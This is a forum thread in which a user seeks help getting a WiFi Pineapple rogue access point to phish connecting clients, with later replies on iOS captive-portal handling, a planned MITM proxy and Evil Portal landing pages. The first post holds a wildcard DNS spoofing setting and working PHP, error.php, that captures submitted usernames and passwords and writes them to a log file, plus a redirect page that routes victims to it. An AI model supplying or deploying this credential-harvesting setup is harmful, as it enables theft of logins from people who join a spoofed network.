Jump to content

Phishing with a WiFi Pineapple


Recommended Posts

Hi again !

After reading several manuals regarding using fish catching i didnt get any luck with it

(maybe coz mark IV and V is different ?)

My target is to redirect all incoming traffic to index.html

anyone can advise what im doing wrong plz ?

my setting is below :

DNS

172.16.42.1 *

Index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>

redirect.php

<?php
        $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

        if (strpos($ref, "*")){
		header('Home');
                header('Location: index.html');
        }

        require('error.php');

?>

error.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

        $filed = @fopen("/tmp/pineapple-phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
}
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

when client connects to pineapple he getting blank page..

if internet present client is able to use it

Ps: Karma is running

Firmware Version: 2.1.1

PHP Version 5.4.5 System Linux Pineapple 3.3.8 #21 Tue Dec 9 16:16:09 PST 2014 mips Build Date Oct 9 2014 16:09:31
Link to post
Share on other sites

Thanks 4 replays

After i made some research i realised 2 week point

1) Can not set up automatic DNS spoof (dips pins etc don't have any decent description i mean set up manual)

2) Browsers.. is another story..

a) Safary 502 Bad Gateway (nginx /1.2.2)

Strange thing is : after i join network from iphone for a second i saw half login screen.. saying captive.apple.com

Tony is name of my network

anyone can explain ??

captive.apple.com anyone can explain ???

b) Opera .. is good.. mobile opera same as standard version

PS:

Just read this article

http://stackoverflow.com/questions/19682624/bypasses-apple-captive-network-assistant-login-in-ios-7

post-49376-0-21876400-1419617704_thumb.p

Edited by troter
Link to post
Share on other sites

not that specificaly, but seb mentioned in a different thread that they are working on one of their own designed for the mk5! said hoped to have it out before the end of this year, good things to come :D and hopefully with the new sslstrip :D

Link to post
Share on other sites

he mentions it in this post

https://forums.hak5.org/index.php?/topic/34187-release-211-codename-pineosauria-mobilus/?p=254756

Happens to all of us ;)

All the changes / additions we have made can be found in the changelog on the first page.

In regards to a better dnsspoof, we are still working on our MITM proxy which will hopefully be released before the end of the year.

Otherwise, we'll soon have a hangout where we will discuss future features.

Best regards,

Sebkinne

Edited by datahead
Link to post
Share on other sites

i find evil portal to be great at phishing. Depending on how you setup your landing page of course.

Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?

Link to post
Share on other sites

Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?

Ish... Some php-fu should be able to determine the domain queried and forward on to an adequate landing page. I haven't tried it myself but knowing nodogsplash, the data required should be there somewhere.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...